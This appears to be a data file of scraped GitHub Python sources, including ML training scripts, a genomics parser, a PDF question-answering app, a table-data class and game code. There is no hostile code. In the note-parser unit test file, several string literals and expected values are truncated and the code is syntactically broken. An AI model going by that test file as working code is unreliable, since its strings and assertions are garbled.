endpoint\r\n results = query_sparql_endpoint(query)\r\n\r\n # create geojson if possible\r\n cams_data_geojson = convert_query_output_to_geojson(results)\r\n\r\n # print geojson\r\n print(cams_data_geojson)\r\n\r\n\r\n\r\n \r\n","repo_name":"terranea/AQQA","sub_path":"components/aq_kg_query/strabon_query_data.py","file_name":"strabon_query_data.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30754927673","text":"import os\nfrom os.path import lexists\n\nclass MoveFileCommand(object):\n \n def __init__(self,src,dest):\n self.src = src\n self.dest = dest\n \n def execute(self):\n self.rename(self.src,self.dest)\n \n def undo(self):\n self.rename(self.dest,self.src)\n \n def rename(self,src,dest):\n print(\"rename {} to {}\".format(src,dest))\n os.rename(src,dest)\n \ndef main():\n command_stack = []\n \n command_stack.append(MoveFileCommand('foo.txt','bar.txt'))\n command_stack.append(MoveFileCommand('bar.txt','baz.txt'))\n \n assert(not lexists(\"foo.txt\"))\n assert(not lexists(\"bar.txt\"))\n assert(not lexists(\"baz.txt\"))\n try:\n with open(\"foo.txt\",\"w\"):\n pass\n for cmd in command_stack:\n cmd.execute()\n \n for cmd in reversed(command_stack):\n cmd.undo()\n finally:\n os.unlink(\"foo.txt\")\n\nif __name__ == '__main__':\n main()","repo_name":"yk0817/design_pattern_study","sub_path":"design_pattern_code/command2.py","file_name":"command2.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32051811584","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nfrom shutil import copyfile\nfrom os.path import dirname\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef make_directory(path):\n \"\"\"Short summary.\n\n Parameters\n ----------\n path : Full path to the directory\n\n \"\"\"\n\n if not os.path.isdir(path):\n os.mkdir(path)\n print(\"Making directory: \" + path)\n else:\n print(\"Directory already exists!\")\n\ndef get_parent(filepath):\n return dirname(filepath)\n\n\ndef load_data(file_path, reverse_compliment=False):\n # load dataset\n\n dataset = h5py.File(file_path, 'r')\n X_train = np.array(dataset['x_train']).astype(np.float32)\n Y_train = np.array(dataset['y_train']).astype(np.float32)\n X_valid = np.array(dataset['x_valid']).astype(np.float32)\n Y_valid = np.array(dataset['y_valid']).astype(np.float32)\n X_test = np.array(dataset['x_test']).astype(np.float32)\n Y_test = np.array(dataset['y_test']).astype(np.float32)\n X_train = X_train.transpose(0,2,1)\n X_valid = X_valid.transpose(0,2,1)\n X_test = X_test.transpose(0,2,1)\n if reverse_compliment:\n X_train_rc = X_train[:,::-1,:][:,:,::-1]\n X_valid_rc = X_valid[:,::-1,:][:,:,::-1]\n X_test_rc = X_test[:,::-1,:][:,:,::-1]\n\n X_train = np.vstack([X_train, X_train_rc])\n X_valid = np.vstack([X_valid, X_valid_rc])\n X_test = np.vstack([X_test, X_test_rc])\n\n Y_train = np.vstack([Y_train, Y_train])\n Y_valid = np.vstack([Y_valid, Y_valid])\n Y_test = np.vstack([Y_test, Y_test])\n print(\"Training set sizes: \", X_train.shape)\n return X_train, Y_train, X_valid, Y_valid, X_test, Y_test\n\ndef plot_training(history, keyword, outdir):\n fig, ax = plt.subplots()\n ax.plot(history.history[keyword])\n ax.plot(history.history['val_{}'.format(keyword)])\n ax.set_title('model {}'.format(keyword.upper()))\n ax.set_ylabel(keyword)\n ax.set_xlabel('epoch')\n ax.legend(['train', 'test'], loc='upper left')\n fig.savefig(os.path.join(outdir, '{}.pdf'.format(keyword)))\n","repo_name":"shtoneyan/codebase","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70116970116","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 2 10:27:02 2016\r\n\r\n@author: KatieM\r\n\"\"\"\r\n#function takes a folder of ASCII table text files,\r\n#and makes a graph from the files in the folder\r\n#using the given y limits. \r\ndef graphfiles2(folder, yn, ym):\r\n import numpy as np\r\n import datetime as dt\r\n import matplotlib.pyplot as plt\r\n import glob\r\n folder = glob.glob(folder)\r\n#opens the first file in the folder, reads it, and puts it's text in a list.\r\n f = open(folder[0], 'r')\r\n d = f.readlines()\r\n f.close()\r\n#creates a list \"file\" that contains the data of the file\r\n file = []\r\n for each in d[5:len(d)]:\r\n each = each[0:len(each) - 1]\r\n file = file + each.split(\", \")\r\n#creates a list \"labels\" which contains the labels for all the variables. \r\n labels = d[2].split(\", \")\r\n#finds the integer \"varl\" which is the number of variables in the graph.\r\n leng = d[5].split(\", \")\r\n varl = len(leng)\r\n#constructs a list of of the values in the first file, \r\n#seperated by the type of value (ex: [[xvalues], [y1values], [y2values]]) \r\n values = []\r\n for i in range(0,varl):\r\n values = values + [[]]\r\n values[0] = values[0] + file[0:len(file) - (varl - 1):varl]\r\n for i in range(1,len(values)):\r\n values[i] = values[i] + file[i:len(file) - (varl - i - 1):varl]\r\n\r\n#puts the values in all the other files into the list \"values\",\r\n#each in the correct list. \r\n for each in folder[0:len(folder) + 1]:\r\n f = open(each, 'r')\r\n data = f.readlines()\r\n f.close()\r\n \r\n file = []\r\n for each in data[5:len(data)]:\r\n each = each[0:len(each) - 1]\r\n file = file + each.split(\", \")\r\n values[0] = values[0] + file[0:len(file) - (varl - 1):varl]\r\n for i in range(1,len(values)):\r\n values[i] = values[i] + file[i:len(file) - (varl - i - 1):varl]\r\n \r\n\r\n \r\n \r\n \r\n#changes the x values to a number of seconds. \r\n import calendar\r\n vall = []\r\n for i in range(0, len(values[0])):\r\n val = [int(values[0][i][0:4]), \r\n int(values[0][i][5:7]), \r\n int(values[0][i][8:10]), \r\n int(values[0][i][11:13]), \r\n int(values[0][i][14:16]), \r\n int(values[0][i][17:19])]\r\n vall = vall + [val]\r\n values[0][i] = calendar.timegm(val)\r\n im = values[0].index(min(values[0]))\r\n yr1 = vall[im][0]\r\n mn1 = vall[im][1]\r\n dy1 = vall[im][2]\r\n hr1 = vall[im][3]\r\n mi1 = vall[im][4]\r\n sc1 = vall[im][5]\r\n s = min(values[0])\r\n b = max(values[0]) - s\r\n#labels the x axis based on the range of x values \r\n if b > 63115200:\r\n b = 31557600\r\n c = \"Time(years)\"\r\n elif b > 172800:\r\n b = 86400\r\n c = \"Time(days)\"\r\n elif b > 7200:\r\n b = 3600\r\n c = \"Time(hours)\"\r\n elif b > 120:\r\n b = 60\r\n c = \"Time(minutes)\"\r\n else:\r\n b = 1\r\n c = \"Time(seconds)\" \r\n \r\n for i in range(0, len(values[0])):\r\n values[0][i] = (values[0][i] - s) / b\r\n#labels the x axis based on the range of x values and start time. \r\n xl =c + \". Start time: \" + \"{}/{}/{}, {}:{}:{}\".format(str(yr1), str(mn1), str(dy1), str(hr1), str(mi1), str(sc1)) \r\n plt.xlabel(xl)\r\n\r\n#makes sure that if all the y variables have the same units,\r\n#that the y axis is labeled instead of having a legend.\r\n if len(labels) == 1 and varl != 1:\r\n plt.ylabel(labels[0])\r\n for i in range(1,len(values)):\r\n plt.plot(values[0], values[i])\r\n else:\r\n#plots the plot, with the labels of all the y variables in a legend.\r\n for i in range(1,len(values)):\r\n plt.plot(values[0], values[i], label=labels[i])\r\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\r\n \r\n#sets the graph to have the given y limits.\r\n plt.ylim(yn, ym)\r\n#gives the graph the title specified in the files\r\n T = d[1][9:len(d[1]) - 1]\r\n plt.title(T)\r\n#shows the graph.\r\n plt.show() \r\n \r\n\r\n \r\ngraphfiles2(\"C:/Users/KatieM/Desktop/Graphs2/*\", -5, 5)\r\n","repo_name":"awbrenem/online_file_query","sub_path":"Graphfromfolder2-a.py","file_name":"Graphfromfolder2-a.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6500822436","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\n# load datasets\nfashion_mnist = tf.keras.datasets.fashion_mnist\n(Xtrain, Ytrain), (Xtest, Ytest) = fashion_mnist.load_data()\n\n# Ground Truth class names(category = 10)\nclass_names = [\"T-shirt/top\", \"Trouser\", \"Pullover\", \"Dress\", \"Coat\", \"Sandal\", \"Shirt\", \"Sneaker\", \"Bag\", \"Ankle boot\"]\n\n# split validation data, and normalization [0, 1]\nXvalid, Xtrain = Xtrain[:5000] / 255.0, Xtrain[5000:] / 255.0\nYvalid, Ytrain = Ytrain[:5000], Ytrain[5000:]\n\n# use Sequential to create the model\nmodel = tf.keras.models.Sequential()\nmodel.add(tf.keras.layers.Flatten(input_shape=[28, 28])) # Convent data into 1D array\nmodel.add(tf.keras.layers.Dense(300, activation=tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(100, activation=tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(len(class_names), activation=tf.nn.softmax))\n# model.summary()\n\n# tf.keras.utils.plot_model(model) install failed.\n\n# model layer list\nlayer_list = model.layers\n# print(f'Input Layer: {layer_list[0]}, Layer Name: {layer_list[0].name}')\n# print(f'Hidden Layer1: {layer_list[1]}, Layer Name: {layer_list[1].name}')\n# print(f'Hidden Layer2: {layer_list[2]}, Layer Name: {layer_list[2].name}')\n# print(f'Output Layer: {layer_list[3]}, Layer Name: {layer_list[3].name}')\n\n# get the weight, bias of each layer\nw1, b1 = layer_list[1].get_weights()\n# print(f'weight shape: {w1.shape}, bias shape: {b1.shape}')\n# 連結權重矩陣在 ch11 提到, 更詳細的部分可以參考 https://keras.io/initializers/\n\n# compile model\n# One-Hot Encode 需要改成 categorical_crossentropy, 否則 sparse_categorical_crossentropy\nmodel.compile(\n loss=\"sparse_categorical_crossentropy\",\n optimizer='sgd',\n metrics=['accuracy']\n)\n\n# train & evaluation model\nhistory = model.fit(Xtrain, Ytrain, epochs=30, batch_size=1000, validation_data=(Xvalid, Yvalid))\n# parameters:\n# class_weight: 設定類別權重(假如資料不平均時, 可以讓少的有大權重, 多的低權重)\n# sample_weight: 設定實例權重(假如有些實例是專家標記的, 有些是其他人標記的, 可以讓前者有較高的權重)\n# 若提供上面這兩個參數, keras 裡面會將兩者相乘\n\nscore = model.evaluate(Xtest, Ytest)\nprint(f'loss: {score[0]}, accuracy: {score[1]}')\n\n# draw image\n# pd.DataFrame(history.history).plot(figsize=(8, 5))\n# plt.grid(True)\n# plt.gca().set_ylim(0, 1) # set the Y axis between 0 and 1\n# plt.show()\n\n# predict\nXnew = Xtest[:3]\nYProbability = model.predict(Xnew)\nprint(f'Probability: {YProbability}')\nprint(f'Predict Class: ', np.where((YProbability > 0.5).astype(np.int) == 1)[1])\n\n","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/DeepLearning/tensorflow_use2/CH10 ANN introduce/tf_mnist_classifier.py","file_name":"tf_mnist_classifier.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74026134915","text":"import os\nimport shutil\n\nimport unittest\nimport json\n\nfrom fdz import fdz\nfrom fdz.note_parser import parse_string\n\nSAMPLE_NOTES = \"tests/sample_notes\"\n\nclass TestFileActions(unittest.TestCase):\n \"\"\"Tests for `fdz.fileactions` functions.\"\"\"\n\n def test_parse_comment(self):\n \"\"\"Test Directory Initialization.\"\"\"\n comment_string = 'testing'\n parse_comment = parse_string(comment_string)\n self.assertEqual(parse_comment, [{'section':'title', 'text':['testing']}])\n\n def test_multiline_string(self):\n uncommented_string = '''hello my \nhello'''\n parse_uncommented = parse_string(uncommented_string)\n self.assertEqual(parse_uncommented, [{'section':'title', 'text':['hello my '''\n parse_double=parse_string(double_comment_string)\n self.assertEqual(parse_double, [])\n\n text_comment=\"hello\"\n parse_text_comment=parse_string(text_comment)\n print(parse_text_comment)\n self.assertEqual(parse_text_comment, [])\n text_comment_text=\"hellohello\"\n parse_text_comment_text=parse_string(text_comment_text)\n self.assertEqual(parse_text_comment_text, [{'section':'title','text':['hello']}])\n\n def test_parse_delimiter(self):\n delim_string=''' hello'''\n delim_parse = parse_string(delim_string)\n expected = [{'section':'title','delimiter':',','text':['hello']}]\n self.assertEqual(delim_parse,expected)\n\n def test_strip_headers(self):\n header_string=''' ### hello '''\n header_parse=parse_string(header_string)\n expected = [{'section':'title', 'text':['hello']}]\n self.assertEqual(header_parse, expected)\n\n def test_full_note(self):\n full_note=None\n parsed_note_sample=None\n with open(f'{SAMPLE_NOTES}/zettl_1.md', 'r') as f:\n full_note = f.read()\n with open(f'{SAMPLE_NOTES}/zettl_1_parse.json', 'r') as fj:\n parsed_note_sample = json.load(fj)\n full_note_parse = parse_string(full_note)\n print(full_note_parse)\n self.assertEqual(full_note_parse, parsed_note_sample)\n\n","repo_name":"biniona/FDZ","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28047948271","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom ckg.graphdb_builder import builder_utils\n\ndef parser(projectId):\n data = {}\n config = builder_utils.get_config(config_name=\"wes.yml\", data_type='experiments')\n directory = '../../../data/experiments/PROJECTID/wes/'\n if 'directory' in config:\n directory = config['directory']\n directory = directory.replace('PROJECTID', projectId)\n wes_data = parseWESDataset(projectId, config, directory)\n if wes_data is not None:\n somatic_mutations = pd.DataFrame()\n for sample in wes_data:\n entities, variantRows, sampleRows, geneRows, chrRows = extractWESRelationships(wes_data[sample], config)\n data[('somatic_mutation_known_variant', 'w')] = variantRows\n data[('somatic_mutation_sample', 'w')] = sampleRows\n data[('somatic_mutation_gene', 'w')] = geneRows\n data[('somatic_mutation_chromosome', 'w')] = chrRows\n if somatic_mutations.empty:\n somatic_mutations = entities\n else:\n new = set(entities.index).difference(set(somatic_mutations.index))\n somatic_mutations = somatic_mutations.append(entities.loc[new,:], ignore_index=False)\n somatic_mutations = somatic_mutations.reset_index()\n data[('somatic_mutation', 'w')] = somatic_mutations\n\n return data\n\ndef parseWESDataset(projectId, configuration, dataDir):\n datasets = {}\n files = builder_utils.listDirectoryFiles(dataDir)\n for dfile in files:\n filepath = os.path.join(dataDir, dfile)\n if os.path.isfile(filepath):\n sample, data = loadWESDataset(filepath, configuration)\n datasets[sample] = data\n\n return datasets\n\ndef loadWESDataset(uri, configuration):\n ''' This function gets the molecular data from a Whole Exome Sequencing experiment.\n Input: uri of the processed file resulting from the WES analysis pipeline. The resulting\n Annovar annotated VCF file from Mutect (sampleID_mutect_annovar.vcf)\n Output: pandas DataFrame with the columns and filters defined in config.py '''\n aux = uri.split(\"/\")[-1].split(\"_\")\n sample = aux[0]\n #Get the columns from config\n columns = configuration[\"columns\"]\n #Read the data from file\n data = builder_utils.readDataset(uri)\n if configuration['filter'] in data.columns:\n data = data.loc[data[configuration['filter']], :]\n data = data[columns]\n data[\"sample\"] = aux[0]\n data[\"variant_calling_method\"] = aux[1]\n data[\"annotated_with\"] = aux[2].split('.')[0]\n data[\"alternative_names\"] = data[configuration[\"alt_names\"]]\n data = data.drop(configuration[\"alt_names\"], axis = 1)\n data = data.iloc[1:]\n data = data.replace('.', np.nan)\n data[\"ID\"] = data[configuration[\"id_fields\"]].apply(lambda x: str(x[0])+\":g.\"+str(x[1])+str(x[2])+'>'+str(x[3]), axis=1)\n data.columns = configuration['new_columns']\n return sample, data\n\ndef extractWESRelationships(data, configuration):\n entityAux = data.copy()\n entityAux = entityAux.set_index(\"ID\")\n\n variantAux = data.copy()\n variantAux = variantAux.rename(index=str, columns={\"ID\": \"START_ID\"})\n variantAux[\"END_ID\"] = variantAux[\"START_ID\"]\n variantAux = variantAux[[\"START_ID\", \"END_ID\"]]\n variantAux[\"TYPE\"] = \"IS_KNOWN_VARIANT\"\n variantAux = variantAux.drop_duplicates()\n variantAux = variantAux.dropna(how=\"any\")\n variantAux = variantAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n\n sampleAux = data.copy()\n sampleAux = sampleAux.rename(index=str, columns={\"ID\": \"END_ID\", \"sample\": \"START_ID\"})\n sampleAux[\"TYPE\"] = \"HAS_MUTATION\"\n sampleAux = sampleAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n\n geneAux = data.copy()\n geneAux = geneAux.rename(index=str, columns={\"ID\": \"START_ID\", \"gene\": \"END_ID\"})\n geneAux[\"TYPE\"] = \"VARIANT_FOUND_IN_GENE\"\n geneAux = geneAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n s = geneAux[\"END_ID\"].str.split(';').apply(pd.Series, 1).stack().reset_index(level=1, drop=True)\n del geneAux[\"END_ID\"]\n aux = s.to_frame(\"END_ID\")\n geneAux = geneAux.join(aux)\n\n chrAux = data.copy()\n chrAux = chrAux.rename(index=str, columns={\"ID\": \"START_ID\", \"chr\": \"END_ID\"})\n chrAux[\"END_ID\"] = chrAux[\"END_ID\"].str.replace(\"chr\",'')\n chrAux[\"TYPE\"] = \"VARIANT_FOUND_IN_CHROMOSOME\"\n chrAux = chrAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n\n return entityAux, variantAux, sampleAux, geneAux, chrAux\n","repo_name":"MannLabs/CKG","sub_path":"ckg/graphdb_builder/experiments/parsers/wesParser.py","file_name":"wesParser.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"61"} +{"seq_id":"36435887504","text":"import streamlit as st\nfrom PyPDF2 import PdfReader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain.vectorstores import FAISS\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain.llms import GPT4All\nimport ai_path as pa\ndef main():\n st.set_page_config(page_title=\"ask pdf\")\n st.header(\"Ask anything about your pdf\")\n\n pdf = st.file_uploader(\"Upload PDF\", type=\"pdf\")\n\n if pdf is not None:\n pdf_reader = PdfReader(pdf)\n text = \"\"\n for page in pdf_reader.pages:\n text += page.extract_text()\n\n text_splitter = CharacterTextSplitter(\n separator= \"\\n\",\n chunk_size=1000,\n chunk_overlap=200,\n length_function=len,\n )\n chunks = text_splitter.split_text(text)\n \n instruct_embeddings = HuggingFaceInstructEmbeddings(\n model_name=\"hkunlp/instructor-large\",\n #change to gpu or cpu based on FAISS using cpu or gpu\n # model_kwargs={\"device\":\"cuda\"}\n model_kwargs={\"device\":\"cpu\"}\n ) \n\n knowledge_base = FAISS.from_texts(chunks,instruct_embeddings)\n\n user_question = st.text_input(\"Ask a question about the contents of your pdf\")\n llm = GPT4All(\n model = pa.MODEL_PATH,\n max_tokens=2048,\n )\n\n if user_question:\n documents = knowledge_base.similarity_search(user_question)\n chain = load_qa_chain(llm=llm,chain_type=\"stuff\")\n response = chain.run(input_documents=documents, question=user_question)\n st.write(response)\n\nif __name__ == \"__main__\":\n main()","repo_name":"JuanP0411/LangChain-PDF-Reader","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8547627164","text":"import copy\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Union\n\nimport numpy as np\nimport pandas as pd\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore\nfrom qtextras import OptionsDict, fns\nfrom qtextras.typeoverloads import FilePath\n\nfrom .templatemgr import IOTemplateManager\nfrom .yamlparser import YamlParser\nfrom ..constants import REQD_TBL_FIELDS as RTF\nfrom ..generalutils import getMaybeReplaceKey\nfrom ..parameditors.tablefilter import TableFilterEditor\nfrom ..structures import OptionsDictGroup\n\n\ndef getFieldAliases(field: OptionsDict):\n \"\"\"\n Returns the set of all potential aliases to a given field\n \"\"\"\n return set([field.name] + field.opts.get(\"aliases\", []))\n\n\ndef aliasesToRequired(field: OptionsDict):\n \"\"\"\n Returns true or false depending on whether this field shares aliases with required\n fields. This is useful when an alternative (incoming) representation of e.g. Vertices\n must be suppressed on import, but still used on export\n \"\"\"\n requiredAliases = set()\n for reqdField in RTF:\n requiredAliases.update(getFieldAliases(reqdField))\n srcAliases = getFieldAliases(field)\n return srcAliases & requiredAliases\n\n\nclass TableData(QtCore.QObject):\n sigConfigUpdated = QtCore.Signal(object)\n \"\"\"dict (self.config) during update\"\"\"\n filter: Optional[TableFilterEditor]\n\n ioTemplate = \"s3a\"\n\n def __init__(\n self,\n configPath: FilePath = None,\n configDict: dict = None,\n template: Union[FilePath, dict] = None,\n makeFilter=False,\n ):\n super().__init__()\n if template is None:\n template = self.ioTemplate\n if isinstance(template, str):\n template = IOTemplateManager.getTableConfig(template)\n self.template = template\n\n self.factories: Dict[OptionsDict, Callable[[], Any]] = {}\n\n if makeFilter:\n self.filter = TableFilterEditor()\n else:\n self.filter = None\n self.parameterParser: Optional[YamlParser] = None\n\n self.configPath: Optional[Path] = None\n self.config: Optional[dict] = {}\n\n self.allFields: List[OptionsDict] = []\n self.resetLists()\n\n configPath = configPath or None\n self.loadConfig(configPath, configDict, force=True)\n\n def makeComponentDf(self, rows=1, sequentialIds=False) -> pd.DataFrame:\n \"\"\"\n Creates a dataframe for the requested number of components. This is the\n recommended method for component instantiation prior to table insertion.\n \"\"\"\n df_list = []\n dropRow = False\n if rows <= 0:\n # Create one row and drop it, which ensures data types are correct in the\n # empty dataframe\n rows = 1\n dropRow = True\n populators = []\n for f in self.allFields:\n if f in self.factories:\n val = self.factories[f]()\n else:\n val = f.value\n populators.append(val)\n\n for _ in range(rows):\n # Make sure to construct a separate component instance for\n # each row no objects have the same reference\n df_list.append(copy.copy(populators))\n outDf = pd.DataFrame(df_list, columns=self.allFields)\n if RTF.ID in self.allFields:\n if sequentialIds:\n outDf[RTF.ID] = np.arange(len(outDf), dtype=int)\n outDf = outDf.set_index(RTF.ID, drop=False)\n if dropRow:\n outDf = outDf.iloc[0:0]\n return outDf\n\n def addFieldFactory(self, fieldLabel: OptionsDict, factory: Callable[[], Any]):\n \"\"\"\n For fields that are simple functions (i.e. don't require input from the user),\n a factory can be used to create default values when instantiating new table rows.\n\n Parameters\n ----------\n fieldLabel\n WHich field this factory is used for instead of just the default value\n factory\n Callable to use instead of field value. This is called with no parameters.\n \"\"\"\n self.factories[fieldLabel] = factory\n\n def addField(self, field: OptionsDict):\n \"\"\"\n Adds a new field to the table. If the field already exists in the current\n table, no action is performed. Returns *True* if a field really was added,\n *False* if this field is already in the table list or aliases to an existing\n field\n \"\"\"\n\n # Problems occur when fields alias to already existing ones. When this is the\n # case, ignore the extra fields. Not only does this solve the many-to-one alias\n # issue, but also allows table datas with different required fields to\n # seamlessly share and swap fields with eachother while avoiding vestigial\n # table columns\n if field in self.allFields or self._findMatchingField(field) is not field:\n return False\n field.group = self.allFields\n self.allFields.append(field)\n if field.name not in self.config[\"fields\"]:\n # Added programmatically outside config, ensure file representation is not\n # lost\n self.config[\"fields\"][field.name] = newFieldCfg = dict(field)\n # Remove redundant `name` field\n newFieldCfg.pop(\"name\")\n return True\n\n def makeComponentSeries(self):\n return self.makeComponentDf().squeeze()\n\n def loadConfig(\n self, configPath: FilePath = None, configDict: dict = None, force=False\n ):\n \"\"\"\n Lodas the specified table configuration file for S3A. Alternatively, a name\n and dict pair can be supplied instead.\n\n Parameters\n ----------\n configPath\n If *configDict* is *None*, this is treated as the file containaing a\n YAML-compatible table configuration dictionary. Otherwise, this is the\n configuration name assiciated with the given dictionary.\n configDict\n If not *None*, this is the config data used instad of reading ``configFile``\n as a file.\n force\n If *True*, the new config will be loaded even if it is the same name as the\n current config\n \"\"\"\n baseConfigDict = copy.deepcopy(self.template)\n if configPath is not None:\n configPath, configDict = fns.resolveYamlDict(configPath, configDict)\n configPath = configPath.resolve()\n # Often, a table config can be wrapped in a project config; look for this case\n # first\n if configDict is not None and (\n \"table-config\" in configDict or \"table-cfg\" in configDict\n ):\n configDict = getMaybeReplaceKey(\n configDict, oldKey=\"table-cfg\", newKey=\"table-config\"\n )\n\n fns.hierarchicalUpdate(baseConfigDict, configDict, uniqueListElements=True)\n cfg = baseConfigDict\n if not force and self.configPath == configPath and pg.eq(cfg, self.config):\n return None\n\n self.configPath = configPath or self.configPath\n self.config = cfg\n self.parameterParser = YamlParser(cfg)\n self.resetLists()\n for field in cfg.get(\"fields\", {}):\n param = self.parameterParser[\"fields\", field]\n self.addField(param)\n\n if self.filter:\n self.filter.updateParameterList(self.allFields)\n self.sigConfigUpdated.emit(self.config)\n\n def clear(self):\n self.loadConfig(configDict={})\n\n def resetLists(self):\n self.allFields.clear()\n\n def fieldFromName(self, name: Union[str, OptionsDict], default=None):\n \"\"\"\n Helper function to retrieve the OptionsDict corresponding to the field with this\n name\n \"\"\"\n return OptionsDictGroup.fieldFromParameter(self.allFields, name, default)\n\n def resolveFieldAliases(self, fields: Sequence[OptionsDict], mapping: dict = None):\n \"\"\"\n Several forms of imports / exports handle data that may not be compatible with\n the current table data. In these cases, it is beneficial to determine a mapping\n between names to allow greater compatibility between I/O formats. Mapping is\n also extended in both directions by parameter name aliases (parameter.opts[\n 'aliases']), which are a list of strings of common mappings for that parameter\n (e.g. [Class, Label] are often used interchangeably)\n\n Parameters\n ----------\n fields\n Dataframe with maybe foreign fields\n mapping\n Foreign to local field name mapping\n \"\"\"\n\n outFields = []\n for srcField in fields:\n outFields.append(self._findMatchingField(srcField, mapping))\n return outFields\n\n def _findMatchingField(self, srcField, mapping: dict = None):\n # Mapping takes priority, if it exists\n if mapping is None:\n mapping = {}\n potentialSrcNames = getFieldAliases(srcField)\n for key in srcField, srcField.name:\n # Mapping can either be by string or OptionsDict, so account for either case\n outCol = mapping.get(key)\n if outCol:\n break\n\n if outCol is not None:\n # A mapping was explicitly provided for this field, use that\n return self.fieldFromName(outCol)\n elif srcField in self.allFields:\n return srcField\n else:\n # Not in mapping, no exact match.\n # TODO: what if multiple dest cols have a matching alias?\n # Otherwise, a 'break' can be added\n curOutName = srcField\n for destField in self.allFields:\n if potentialSrcNames & getFieldAliases(destField):\n # Match between source field's aliases and dest field aliases Make\n # sure it didn't match multiple names that weren't itself with the\n # assert statement In other words, if multiple dest fields have the\n # same alias, this assertion will fail\n assert curOutName == srcField\n curOutName = destField\n return curOutName\n\n def __reduce__(self):\n return TableData, (\n self.configPath,\n self.config,\n self.template,\n self.filter is not None,\n )\n","repo_name":"ntjess/s3a","sub_path":"s3a/tabledata/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20461284776","text":"import event_testing\nfrom event_testing.results import TestResult\nimport services\nfrom sims4.tuning.instances import lock_instance_tunables\nfrom sims4.tuning.tunable import AutoFactoryInit, TunableSingletonFactory, TunableRange, TunableSet, TunableEnumEntry\nfrom sims4.tuning.tunable_base import GroupNames\nfrom situations.situation_goal import SituationGoal\nfrom tag import Tag\n\nclass EarningsOfInterest(AutoFactoryInit):\n __qualname__ = 'EarningsOfInterest'\n FACTORY_TUNABLES = {'tags': TunableSet(description='\\n A set of tags that will match an affordance instead of looking\\n for a specific one. If you leave this empty, all Simoleons earned will be counted.\\n ', tunable=TunableEnumEntry(Tag, Tag.INVALID)), 'amount_to_earn': TunableRange(description='\\n The amount of time in Simoleons earned from all relevant activities for this\\n goal to pass.\\n ', tunable_type=int, default=10, minimum=1)}\n\n def get_expected_args(self):\n return {'amount': event_testing.test_events.FROM_EVENT_DATA, 'tags': event_testing.test_events.FROM_EVENT_DATA}\n\n def __call__(self, amount=None, tags=None):\n if amount is None:\n return TestResult(False, 'Amount is None')\n if len(self.tags) == 0 or tags is not None and self.tags & tags:\n if amount > 0:\n return TestResult.TRUE\n return TestResult(False, 'No money earned')\n return TestResult(False, 'Failed relevant tags check: Earnings do not have any matching tags in {}.', self.tags)\n\nTunableEarningsOfInterest = TunableSingletonFactory.create_auto_factory(EarningsOfInterest)\n\nclass SituationGoalSimoleonsEarned(SituationGoal):\n __qualname__ = 'SituationGoalSimoleonsEarned'\n SIMOLEONS_EARNED = 'simoleons_earned'\n REMOVE_INSTANCE_TUNABLES = ('_post_tests',)\n INSTANCE_TUNABLES = {'_goal_test': TunableEarningsOfInterest(description='\\n Interaction and Simoleon amount that this situation goal will use.\\n Example: Earn 1000 Simoleons from Bartending activities.\\n ', tuning_group=GroupNames.TESTS)}\n\n def __init__(self, *args, reader=None, **kwargs):\n super().__init__(reader=reader, *args, **kwargs)\n self._total_simoleons_earned = 0\n self._test_events = set()\n self._test_events.add(event_testing.test_events.TestEvent.SimoleonsEarned)\n services.get_event_manager().register(self, self._test_events)\n if reader is not None:\n simoleons_earned = reader.read_uint64(self.SIMOLEONS_EARNED, 0)\n self._total_simoleons_earned = simoleons_earned\n\n def create_seedling(self):\n seedling = super().create_seedling()\n writer = seedling.writer\n writer.write_uint64(self.SIMOLEONS_EARNED, self._total_simoleons_earned)\n return seedling\n\n def decommision(self):\n services.get_event_manager().unregister(self, self._test_events)\n super().decommision()\n\n def _run_goal_completion_tests(self, sim_info, event, resolver):\n if not resolver(self._goal_test):\n return False\n amount_to_add = resolver.get_resolved_arg('amount')\n if self._total_simoleons_earned >= self._goal_test.amount_to_earn:\n super()._on_goal_completed()\n 